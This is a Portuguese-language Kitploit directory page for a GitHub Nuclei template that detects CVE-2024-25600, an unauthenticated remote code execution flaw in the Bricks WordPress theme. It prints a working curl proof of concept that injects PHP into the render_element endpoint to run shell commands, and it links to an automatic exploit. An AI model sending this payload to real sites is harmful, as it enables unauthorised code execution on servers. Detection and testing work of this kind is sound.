Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-25600_Nuclei-Template — Modelo Nuclei e informações sobre o POC para CVE-2024-25600 | Kitploit
Ferramentas/GitHubGitHub/christbowel/cve-2024-25600_nuclei-template
Scanners de VulnerabilidadesGeração de PayloadsExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubchristbowel/cve-2024-25600_nuclei-template

CVE-2024-25600_Nuclei-Template

Modelo Nuclei e informações sobre o POC para CVE-2024-25600

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
317há 2 anosRevisado pelo Kitploit

CVE-2024-25600_Nuclei-Template

Modelo Nuclei e informações sobre o POC para CVE-2024-25600

Descrição 📝

O tema Bricks para WordPress é vulnerável a Execução Remota de Código em todas as versões até, e incluindo, 1.9.6. Isso torna possível que atacantes não autenticados executem código no servidor. Este modelo 🛠️ foi projetado para detectar a vulnerabilidade CVE-2024-25600 🕳️ encontrada no plugin Bricks Builder para WordPress usando nuclei. A vulnerabilidade permite execução remota de código não autenticada em sites afetados 💻.

Prova de Conceito (PoC) 📝

O POC completo (automático) está disponível em https://github.com/chocapikk/CVE-2024-25600.

O PoC base fornecido pela divulgação é o seguinte:

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}'

Substitua [HOST] pelo site alvo e [NONCE] pelo valor nonce obtido do site.

Referência 📖

Para mais informações sobre a vulnerabilidade CVE-2024-25600, consulte a divulgação detalhada em Snicco.io.

Baixar ferramenta